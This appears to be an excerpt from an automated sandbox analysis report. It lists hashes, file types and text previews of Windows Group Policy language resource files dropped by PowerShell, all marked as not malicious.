                                                                                                                                                                                                        SHA-512:11A2FB546E64CA105CE63E313FCDDE0950939C5981BEEC4D04CEB0C0C43EB573CC3C5444E71BBD12AD04A902CB4D3FC7C41EB4E9BA601232041716CEE0835622
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Digitalx_DiableApplication_TitleText">Do not allow Digital Locker to run</string>.. <string id="Digitalx_DisableApplication_DescriptionText">Specifies whether Digital Locker can run.....Digital Locker is a dedicated download manager associated with Windows Marketplace and a feature of Windows that can be used to manage and download products acquired and stored in the user's Windows Marketplace Digital Locker.....If you enable this setting, Digital Locker will not run.....If you disable or do not configure this
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (349), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4016
                                                                                                                                                                                                        Entropy (8bit):4.799918196062888
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmNIlyc4TNq1nCsXGT1fnC7SqnBU+l4vnjzyJ1nCsXGT1fnWmoV:EeIlyc4TN0psngSUG+l4vnjzy3psnWP
                                                                                                                                                                                                        MD5:98FB5567E5194E5E7430C553FD07EE50
                                                                                                                                                                                                        SHA1:9CD9DE9B3E9FAD928DCBB73225B7F77B21D7F532
                                                                                                                                                                                                        SHA-256:3EE2D33B8C14490D4315F669873B1E4747EF4C99CF83CB3214FBE02774DF322D
                                                                                                                                                                                                        SHA-512:2DC8749CB1E401E4A7753933861081D80AB9D11D349730289E36FD59EF3F76CFCE63AC71864B7239C05CFAD12F89D7991F1AA79E78751F926A941F82EADD23C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. BEGIN: Custom supportedOn strings -->.. <string id="SUPPORTED_WindowsLonghornServerDesktopExperienceOrVista">.. Windows Server 2008 with Desktop Experience installed or Windows Vista.. </string>.. END: Custom supportedOn strings -->.. <string id="DfdAlertPolicy">Disk Diagnostic: Configure custom alert text</string>.. <string id="DfdAlertPolicyExplain">This policy setting substitutes custom alert text in the disk diagnostic message shown to users when a disk reports a S.M.A.R.T. f
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4247
                                                                                                                                                                                                        Entropy (8bit):4.68691343915682
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm+vfC9KJ5V/MztbEUiTKD48mRCjme9E5J9eWFV:EJN/MdEUiTKs8mwM8Wn
                                                                                                                                                                                                        MD5:74FF3350EF82B0E11EF64C762CF28BE3
                                                                                                                                                                                                        SHA1:8D7BB871CC583EB03E3E104FDC50FCBC974527EB
                                                                                                                                                                                                        SHA-256:D94738C802A64BDA9CCA3947096A97B4DAC05730BD55441ED552595422103A9F
                                                                                                                                                                                                        SHA-512:0729601AD1E861F7DA3E39ECC3878A37AFA3E37C92924446B28FA6BDFB4189D024B7F4E5CE0BF29FE4EB3B51DFA98FE07B7A560DDC521FBDAB4E50EA6C6160C2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootResumePolicy">Turn off boot and resume optimizations</string>.. <string id="BootResumePolicyHelp">This policy setting turns off the boot and resume optimizations for the hybrid hard disks in the system.....If you enable this policy setting, the system does not use the non-volatile (NV) cache to optimize boot and resume.....If you disable this policy setting, the system uses the NV cache to achieve faster boot and resume. The system determines the data that will be stored in the NV cache to optimize boot an
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (382), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9312
                                                                                                                                                                                                        Entropy (8bit):4.685669628790155
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmUA7x7OOWbm7kiE7EC/8GxKU0zOZqIc5fKSuBGfvbKqbKJajDrSy5G+YGmI:EOpKz98U0CgfKSFnWqBXrjksmw03Tja
                                                                                                                                                                                                        MD5:40CA6688DCC63C37ADC92B8CE44A47E1
                                                                                                                                                                                                        SHA1:584E5E4433F642B09081A68167436F41D3615867
SHA-256:9EA35D39FAB49421022E213BE5B8A66404B41BEB2202E17C94BF557FB8C349C4
SHA-512:7711A24BE790431495051BAE7DA407FA961748374C0936CB49FD4F421425C4D92458C5F8E2C356E70923EB91D0DE100D6EB7F401D2EF03A18DD590F7FEF8314A
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DiskQuota">Disk Quotas</string>.. <string id="DQ_Enable">Enable disk quotas</string>.. <string id="DQ_Enable_Help">This policy setting turns on and turns off disk quota management on all NTFS volumes of the computer, and prevents users from changing the setting.....If you enable this policy setting, disk quota management is turned on, and users cannot turn it off.....If you disable the policy setting, disk quota management is turned off, and users cannot turn it on.....If this policy setting is not config

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (575), with CRLF line terminators
Category:dropped
Size (bytes):1218
Entropy (8bit):4.961559763430255
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQJmjI7JMHkJNMLsDe7MBMZc1zcqoFV:cgeD5x8gm8fKxmEPnMLkeKMokFV
MD5:8B49ABCA606DF290D14944330F11A796
SHA1:5FD7496C8553485972A7B35E75386A0CB98199AF
SHA-256:25D3882376CC864E14BF8CBD16065971C8C5F1C88FCEF7C60B4213604F893272
SHA-512:F7C3B0CE37F00F281DCDF46A421295D2CD79298852B2302624CD4AFD27EED160FFB4B9003C2096851DD884E8708000282D55876CFC1FA853DCB437FA65D3F8F3
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DLT_AllowDomainMode">Allow Distributed Link Tracking clients to use domain resources</string>.. <string id="DLT_AllowDomainMode_Explain">Specifies that Distributed Link Tracking clients in this domain may use the Distributed Link Tracking (DLT) server, which runs on domain controllers. The DLT client enables programs to track linked files that are moved within an NTFS volume, to another NTFS volume on the same computer, or to an NTFS volume on another computer. The DLT client can more reliably track links

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (896), with CRLF line terminators
Category:dropped
Size (bytes):31344
Entropy (8bit):4.717542963262439
Encrypted:false
SSDEEP:384:zlbkZcHOReR932i5D5Zbng2C5stOeoXYaYENfOenLtWeoXYaYENfwleyLLhbxEHq:u5XYlXYfleQlnzmW
MD5:7B88F32185E7AEE9D215D367F531C628
SHA1:086E5D851CBD967E907A54539DA3DE95F2F53916
SHA-256:A60EA72F20C54DC7362CB26A10970B4BEDAC5E257E20317BD2CACA1E289DB08D
SHA-512:70CF1A3642D0C6D6866B713DE7A52857CB550C6490B8C62A9605BEFE3811525C3081DCE9DE9F881C361FE88694C256EB03EA168FD489BE9CB0AC48AE4F244BAE
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DNS_Client">DNS Client</string>.. <string id="DNS_Domain">Connection-specific DNS suffix</string>.. <string id="DNS_Domain_Help">Specifies a connection-specific DNS suffix. This policy setting supersedes local connection-specific DNS suffixes, and those configured using DHCP.....To use this policy setting, click Enabled, and then enter a string value representing the DNS suffix.....If you enable this policy setting, the DNS suffix that you enter will be applied to all network connections used by computers

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):7775
Entropy (8bit):4.801945943527714
Encrypted:false
SSDEEP:192:Els7BYDGrS9SqHBf0IpqGKJkPsmcjtJiANpyhSz9zxbBiy:A0bMsBHiANpyh89zxbl
MD5:A2F0FA1F7B955635BAEF6D42E1019FAD
SHA1:52F10ED5BB525A53AD000BAB3D0AD3A8CC696CB9
SHA-256:F54FFC98753D1F03710F912F456B1639B18EC692D2E41FF529A79C5BA8A38B8B
SHA-512:1BB3F4D5A8895C0AA0373E6EBA93636B022BB9709DE40408C46924664A63390593B386EF5A3968F0DBA8DB31F02AFB20455C7AAB95E2498DEB466E89C335D0D9
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="L_IME">IME</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReport">Turn on misconversion logging for misconversion report</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReportExplain">This policy setting allows you to turn on logging of misconversion for the misconversion report.....If you enable this policy setting, misconversion logging is turned on.....If you disable or do not configure this policy setting, misconversion logging is turned off. ....This policy sett

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with very long lines (335), with CRLF line terminators
Category:dropped
Size (bytes):2537
Entropy (8bit):4.7263609685346974
Encrypted:false
SSDEEP:48:yafKUwDTjsFQCzwDNgVC2G1KJzDD8xr2rZkwJXW2V:yuujKQCzwDWC2G1wzDQr2rZkaV
MD5:75AAE2A1219696C7D046F25DA1C331B8
SHA1:0E20307FC43CECFD876B2A03CE998204A4A9D932
SHA-256:5A5BAD4A99052A7DFFAD794A712F606F4421D0323AF8BA4121BB02034C917C1C
SHA-512:18DE3563DB066BB209792A31096B0B98BDF8C2BFE9BBE077D9F2443513F60D3896ACECA4362D26F08F1CF43E3E37EEE242D2E608958E0CFF2136DA65A9B1AB46
Malicious:false
Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ELAMCategory">Early Launch Antimalware</string>.. <string id="POL_DriverLoadPolicy_Name">Boot-Start Driver Initialization Policy</string>.. <string id="POL_DriverLoadPolicy_Name_Help">This policy setting allows you to specify which boot-start drivers are initialized based on a classification determined by an Early Launch Antimalware boot-start driver. The Early Launch Antimalware boot-start driver can return the following classifications for each boot-start driver:..- Good: The driver has been signed and has not been tampered with...- Bad: The driver has been identified as malware. It is recommended that you do not allow known bad drivers to be initialized...- Bad, but required for boot: The driver has been identified as malware, but the computer cannot

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4475
Entropy (8bit):4.731397984218957
Encrypted:false
SSDEEP:48:cs+D5x8gm8fK0QfhWpiSbXFNWf7DwirbOgSuvmrIvZZsSuvLD49MCD49Ms+qDxsL:P+D5pmYYh7SeDDrbQUCMOZxq0/tWFV
MD5:47245202B642C2B6443C63A220226B22
SHA1:6C3DEDBC58314BF1EDCA6EA0D8161E80B8013B1D
SHA-256:59B4266A7E379E4047910594D63B44F4A251684A3C97F74CC16585B2779871AD
SHA-512:4470B0A9568B88965C077F8690BB48BEA88D15A148F2C402D47C17EBB6F52BFB1194FB4B0C328E22DC3772FEF38DCF4E0D33FC966312CAFDFCFA1D0F2539D7E8
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EdgeUI">Edge UI</string>.. <string id="EdgeUI_Help">Contains settings related to system user interfaces attached to the screen edges.</string>.. <string id="TurnOffBackstack">Turn off switching between recent apps</string>.. <string id="TurnOffBackstack_Help">If you enable this setting, users will not be allowed to switch between recent apps. The App Switching option in the PC settings app will be disabled as well.....If you disable or do not configure this policy setting, users will be allowed to sw

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1260
Entropy (8bit):4.910898508580554
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ykJvSmJjbLgn7OL2dOrL0ZFp4D/FV:cgeD5x8gm8fKvJDJ074rFV
MD5:F09A4E370D3321A61FC7456B9A007360
SHA1:58E0F3E0213B3FF00E2C6694D6A0D3A71D9DE55E
SHA-256:E32ECF04721C0695C125F1F8E3ECC0ED14179FC85045C1C44C0D4CCDAA74D085
SHA-512:0BEB4C675E79A2234CAD73F0ADBCAE49B7ED4CD8F62BD6DAC0985EB4C9DBF7C3387B2CEB74C67C2D0052287FD436BECF8D415D22ED72AAB7B296E15C9DFEFECC
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoEncryptOnMove">Do not automatically encrypt files moved to encrypted folders</string>.. <string id="NoEncryptOnMove_Help">This policy setting prevents File Explorer from encrypting files that are moved to an encrypted folder.....If you enable this policy setting, File Explorer will not automatically encrypt files that are moved to an encrypted folder.....If you disable or do not configure this policy setting, File Explorer automatically encrypts files that are moved to an encrypted folder.....This setting ap

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (790), with CRLF line terminators
Category:dropped
Size (bytes):30768
Entropy (8bit):4.691623979168484
Encrypted:false
SSDEEP:384:hAUh6Hw6B8HwwHhZK3KwrQGj4UQ6ic6jKqBO1Mck1S:hAU8MwwHnwiUQXro
MD5:8AB1308CBA6530C458F432AB454C3070
SHA1:099E6CF6F6108281974B2992B3B40E0AED58A994
SHA-256:0E087D6F548B2CDBF2C2EA12CE78DC4F8B9D1A4979AE6FD955CAC4D350AAFABD
SHA-512:C19FDEC863339CB92AF86EE3C2244A13E330B4641241A693D1BD61128AB3A13076652AAD0AC8EB8D757760437311CB12CD94D43AC947CE0361EEA7E8DC99E60D
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Error Reporting</displayName>.. <description>Windows Error Reporting</description>.. <resources>.. <stringTable>.. <string id="CAT_WindowsErrorReporting">Windows Error Reporting</string>.. <string id="CAT_WindowsErrorReportingAdvanced">Advanced Error Reporting Settings</string>.. <string id="CAT_WindowsErrorReportingConsent">Consent</string>.. <string id="PCH_AllOrNoneDef">Default application reporting settings</string>.. <string id="PCH_AllOrNoneDef_Exclude">Do not report any application errors</string>.. <string id="PCH_AllOrNoneDef_Help">This policy setting controls whether errors in general applications are in

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2548
Entropy (8bit):4.859559586253688
Encrypted:false
SSDEEP:24:3KbFDiCUSNsojnPFc9QABiRop6FkY060S9vEWmwlCXFfD1ui/5asx6g7wGuVmoeV:65DySNPjPuSRopa0i8tFBnBrhwGZoeV
MD5:0A764BB7FD1C2BC83CBBA71BDC3F8EB0
SHA1:A7234960D73C854F981680AD4691ACCC5E3F2024
SHA-256:EF69C13304DBA64691227AC0C87F03C89120BEB6003722C43E390BDA572331AD
SHA-512:0F5E549755270FD2E40669321F4E69581BBCB79CE7D905BB6E95E9251C10B76681C6ED19BA623D17C8AD56DD39A6D0104BE60DD0B5FE8045BC4EB8217ED4E772
Malicious:false
Preview:<?xml version="1.0"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0">...<displayName>Event Forwarding</displayName>.....<description>Policy Definitions For Event Forwarding</description>.....<resources>......<stringTable>.......<string id="EventForwarding">Event Forwarding</string>.... <string id="ForwarderResourceUsage">Configure forwarder resource usage</string>.. <string id="ForwarderResourceUsage_Help">This policy setting controls resource usage for the forwarder (source computer) by controlling the events/per second sent to the Event Collector.....If you enable this policy setting, you can control the volume of events sent to the Event Collector by the source computer. This may be required in high volume environments.....If you disable or do not configure this policy setting, forwarder resource usage is not specified.....This setting applies across all subscriptions for the forwarder (source computer).</string>.. .....<

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
                                                                                                                                                                                                        Size (bytes):7756
                                                                                                                                                                                                        Entropy (8bit):4.821366715902771
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EuPOfDUFRKtm/P2R7gHzBwRTLfdpSJlIau:bPOfA+g2RCudH
                                                                                                                                                                                                        MD5:B58D99D32DF6E1076E976FA8ABC3EEEA
                                                                                                                                                                                                        SHA1:4AB6E78ECDC35F98D09AE29B0D7C8D9AB19A91FD
                                                                                                                                                                                                        SHA-256:2863EF5940EC4685D1CF61891191647CE435F325720BC9626A0F2214F56E6EC9
                                                                                                                                                                                                        SHA-512:9A0FF4D6D9BB1A53F01A24DD946945CAB0D4A48053035A8435B4CFB0DCF7690C0CC418E72911FCFBA8379617D328253C236F307F62D1627B0087747816D6AAFE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Channel_Log_AutoBackup">Back up log automatically when full</string>.. <string id="Channel_Log_AutoBackup_Help">This policy setting controls Event Log behavior when the log file reaches its maximum size and takes effect only if the "Retain old events" policy setting is enabled.....If you enable this policy setting and the "Retain old events" policy setting is enabled, the Event Log file is automatically closed and renamed when it is full. A new file is then started.....If you disable this policy setting and th
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2368
                                                                                                                                                                                                        Entropy (8bit):4.905404060928818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQHXEjH4Mj1Zy3snm5R0mM/CJ4tFOmBXOm70oV:cgeD5x8gm8fKI/szB4tFZUoV
                                                                                                                                                                                                        MD5:45EB132CB1F927D22C54EC385A552153
                                                                                                                                                                                                        SHA1:634D98CB8F8BFE12E9CD19CD4764DFCF134CC011
                                                                                                                                                                                                        SHA-256:8911189FB55D6DE6DA90E3ED57336AA7F2323520CF2719CED2E91B76B4AB085D
                                                                                                                                                                                                        SHA-512:32ECD99085199B267FEA70CA5363DFF1270BC083107E80368FD7F48C69E8646078ACFFA3206692CF3F2BF447D4EBB5BBB251F32F1DD712927F836F5751FF47AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EventViewer">Event Viewer</string>.. <string id="EventViewer_RedirectionProgram">Events.asp program</string>.. <string id="EventViewer_RedirectionProgram_Help">This is the program that will be invoked when the user clicks the events.asp link.</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters">Events.asp program command line parameters</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters_Help">This specifies the command line parameters that will be p
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4363
                                                                                                                                                                                                        Entropy (8bit):4.775276168335737
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmUZsDKU5h9ERZR2s0vJVu2MNFBBzUysV:EpZsDx9g0vJVBMNXBzi
                                                                                                                                                                                                        MD5:B8789197191F1A2C461797C595FD8415
                                                                                                                                                                                                        SHA1:DDCB4910A18C318E8E90CF29A92FE70ADFDB20EE
                                                                                                                                                                                                        SHA-256:6CBA67BF6D239FA46E6F2566F1F8653DCBA053DC828AA731DD768C525AF1BB1D
                                                                                                                                                                                                        SHA-512:D05BF9DE3D8ADD27206F4819283E89533AC83ED97AF159023EF46393B5CAB9D5D95D4C32D15C21A0E895CE3820418D71D29553E420F1ADAE7225AEEEFBE1A91E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AlwaysShowClassicMenu">Display the menu bar in File Explorer </string>.. <string id="AlwaysShowClassicMenu_Help">This policy setting configures File Explorer to always display the menu bar.....Note: By default, the menu bar is not displayed in File Explorer.....If you enable this policy setting, the menu bar will be displayed in File Explorer.....If you disable or do not configure this policy setting, the menu bar will not be displayed in File Explorer.....Note: When the menu bar is not displayed, users can ac
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2806
                                                                                                                                                                                                        Entropy (8bit):4.897245212995506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gmFa0I0aUFxafehoPd7idK6a0WaZP5Zo5Z0fd5Z1zarCaO5ZVwKd5ZUwY:LeD5pmFa0I0a4afIa9aZPMcda2aOSYvY
                                                                                                                                                                                                        MD5:8417153A964B75197B8A08F35D62C381
                                                                                                                                                                                                        SHA1:2A4820E67495FCCC524E72AFAB923803755C9F2B
                                                                                                                                                                                                        SHA-256:F8B25ED02542858011F65AE02EBD1C4A62558EE28B76A281656FCF1A70E772BC
                                                                                                                                                                                                        SHA-512:F1DEC0EA5AA367C94CCE27B71B3412FCE370CFF75DF44CCEA5CA931BB52992B30D252144188DFA93FE9E5EF573419DF8BCAEAE9C5DFBA8936E24C80CBDC4D291
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Portable Workspace</displayName>.. <description>This file contains Portable Workspace policy settings.</description>.. <resources>.. <stringTable>.. <string id="PortableOperatingSystem">Portable Operating System</string>.. <string id="PortableOperatingSystem_Launcher_DisplayName">Windows To Go Default Startup Options</string>.. <string id="PortableOperatingSystem_Launcher_Help">....This policy setting controls whether the PC will boot to Windows To Go if a USB device containing a Windows To Go workspace is connected, and controls whether users can make changes using the Windows To Go Startup Options Control Panel item.....If you enable
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):988
                                                                                                                                                                                                        Entropy (8bit):5.031142948192133
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3F6Et8mTc48vzNgW4ZdNHW4fFV:cgeD5x8gm/TagW4Z/HW4fFV
                                                                                                                                                                                                        MD5:76EF9C90CFE65DE37CDBCD4847D584BE
                                                                                                                                                                                                        SHA1:72977FE03FBED6B2FF3C750405CA0838A547471A
                                                                                                                                                                                                        SHA-256:9341A249C8DB566C91BD171482DAA2FAF9D17EF757DB6CBE6829F75D4FCE9492
                                                                                                                                                                                                        SHA-512:2788E014B9335C70D55EBC24139D09C862D3D016B043566A126E2956B53622F443AEE92B5C28BA83B5C670AD03D948BB6D4435B090BFBB992E33DC2F83D01E2F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File History</displayName>.. <description>File History</description>.. <resources>.. <stringTable>.. <string id="FileHistoryName">File History</string>.. <string id="DisableFileHistory">Turn off File History</string>.. <string id="DisableFileHistory_explanation">This policy setting allows you to turn off File History.....If you enable this policy setting, File History cannot be activated to create regular, automatic backups.....If you disable or do not configure this policy setting, File History can be activated to create regular, automatic backups.</string>.. </stringTable>.. </resources>..</policyDefinitionResources>..
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2975
                                                                                                                                                                                                        Entropy (8bit):4.8069063103068785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKn8YD6KENYYqgFd67gJDqrq5x0BsYukrtP4XEgV:LeD5pm3D0uWFm2DaqjCswtPeV
                                                                                                                                                                                                        MD5:353E01C633CBAF640B8238C535A4E3BC
                                                                                                                                                                                                        SHA1:0FC2C8473CB1298245F8D2893D796C3B3BEA14EC
